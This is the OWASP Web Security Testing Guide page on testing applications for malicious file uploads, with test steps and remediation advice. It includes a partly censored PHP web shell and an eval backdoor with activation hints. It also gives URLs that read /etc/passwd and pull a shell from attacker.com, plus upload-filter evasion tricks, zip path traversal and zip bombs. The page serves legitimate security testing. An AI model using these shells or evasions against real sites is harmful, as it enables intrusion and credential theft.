WSTG - v4.1

Test Upload of Malicious Files

ID
WSTG-BUSL-09

Summary

Many application’s business processes allow for the upload of data/information. We regularly check the validity and security of text but accepting files can introduce even more risk. To reduce the risk we may only accept certain file extensions, but attackers are able to encapsulate malicious code into inert file types. Testing for malicious files verifies that the application/system is able to correctly protect against attackers uploading malicious files.

Vulnerabilities related to the uploading of malicious files is unique in that these “malicious” files can easily be rejected through including business logic that will scan files during the upload process and reject those perceived as malicious. Additionally, this is different from uploading unexpected files in that while the file type may be accepted the file may still be malicious to the system.

Finally, “malicious” means different things to different systems, for example Malicious files that may exploit SQL server vulnerabilities may not be considered a “malicious” to a main frame flat file environment.

The application may allow the upload of malicious files that include exploits or shellcode without submitting them to malicious file scanning. Malicious files could be detected and stopped at various points of the application architecture such as: IPS/IDS, application server anti-virus software or anti-virus scanning by application as files are uploaded (perhaps offloading the scanning using SCAP).

Example

Suppose a picture sharing application allows users to upload their .gif or .jpg graphic files to the web site. What if an attacker is able to upload a PHP shell, or exe file, or virus? The attacker may then upload the file that may be saved on the system and the virus may spread itself or through remote processes exes or shell code can be executed.

How to Test

Generic Testing Method

  • Review the project documentation and use exploratory testing looking at the application/system to identify what constitutes and “malicious” file in your environment.
  • Develop or acquire a known “malicious” file. An EICAR anti-malware test file can be used as harmless, but widely detected by antivirus software.
  • Try to upload the malicious file to the application/system and verify that it is correctly rejected.
  • If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.

Exploit Payload

  • Using the Metasploit payload generation functionality generates a shellcode as a Windows executable using the Metasploit “msfpayload” command.
  • Submit the executable via the application’s upload functionality and see if it is accepted or properly rejected.

Malicious File

  • Develop or create a file that should fail the application malware detection process. There are many available on the Internet such as ducklin.htm or ducklin-html.htm.
  • Submit the executable via the application’s upload functionality and see if it is accepted or properly rejected.

Intended Use - EICAR

WebShell Backdoor

For example upload the WebShell-backdoor.php to the target victim site.

<?php
    if(isset($_REQUEST['rq'])){
        echo "<pre>";
        $rq= ($_REQUEST['rq']);
        /* Replace CENSORED with system ($rq) to activate the sample */
        CENSORED;
        echo "</pre>";
        die;
    }
?>

Once it’s uploaded, the testers/hackers may get the password by visiting the URL below.

http://TargetVictimSite.com/WebShell-backdoor.php?rq=cat+/etc/passwd

or it may execute by remote file injection as below.

http://TargetVictimSite.com/File.php?include=http://attacker.com/WebShell-backdoor.php

Other PHP example:

<?php @CENSORED($_POST['password']);?>

Replace @CENSORED with @eval

Invalid File

  • Set up the intercepting proxy to capture the “valid” request for an accepted file.
  • Send an “invalid” request through with a valid/acceptable file extension and see if the request is accepted or properly rejected.

Source Code Review

When there is file upload feature supported, the following API/methods are common to be found in the source code.

  • Java: new file, import, upload, getFileName, Download, getOutputString
  • C/C++: open, fopen
  • PHP: move_uploaded_file(),Readfile, file_put_contents(),file(),parse_ini_file(), copy(),fopen(),include(), require()

Evasion of the Filter

The following techniques may be used to bypass the website file upload checking rules and filters.

  • Change the value of Content-Type as image/jpeg in HTTP request
  • Change the extensions as executable extensions such as file.php5, file.shtml, file.asa, file.cert, file.jsp, file.jspx, file.aspx, file.asp, file.phtml
  • Changes of capital letters of extensions. such as file.PhP or file.AspX
  • Using special trailing such as spaces, dots or null characters such as file.asp..., file.php;jpg, file.asp%00.jpg, 1.jpg%00.php

The executable extensions should be in black list such as file.php5, file.shtml, file.asa, file.cert, file.jsp, file.jspx, file.aspx, file.asp, file.phtml

  • In IIS6 vulnerability, if the file name is file.asp;file.jpg, the file will be executed as file.asp:

http://www.targetVictim.com/path/file.asp;file.jpg

  • In NginX, if the original file name is test.jpg, testers/hackers may change it to test.jpg/x.php

Once it’s uploaded, the file will be executed as x.php

Zip Files Path

One Zip file may contain the malicious PHP with target purpose path such as ..\\..\\..\\..\\hacker.php. If the website doesn’t check the unzip target path, the hacker.php may unzip to the specified path.

Zip Bomb

Upload the ZIP bomb file that may cause application denial of service.

  • new File, file, OutputSteam, upload, import, file_put_contents, open, fopen

Tools

  • Metasploit’s payload generation functionality
  • Intercepting proxy

References

Remediation

While safeguards such as blacklisting or whitelisting of file extensions, using “Content-Type” from the header, or using a file type recognizer may not always be protections against this type of vulnerability. Every application that accepts files from users must have a mechanism to verify that the uploaded file does not contain malicious code. Uploaded files should never be stored where the users or attackers can directly access them.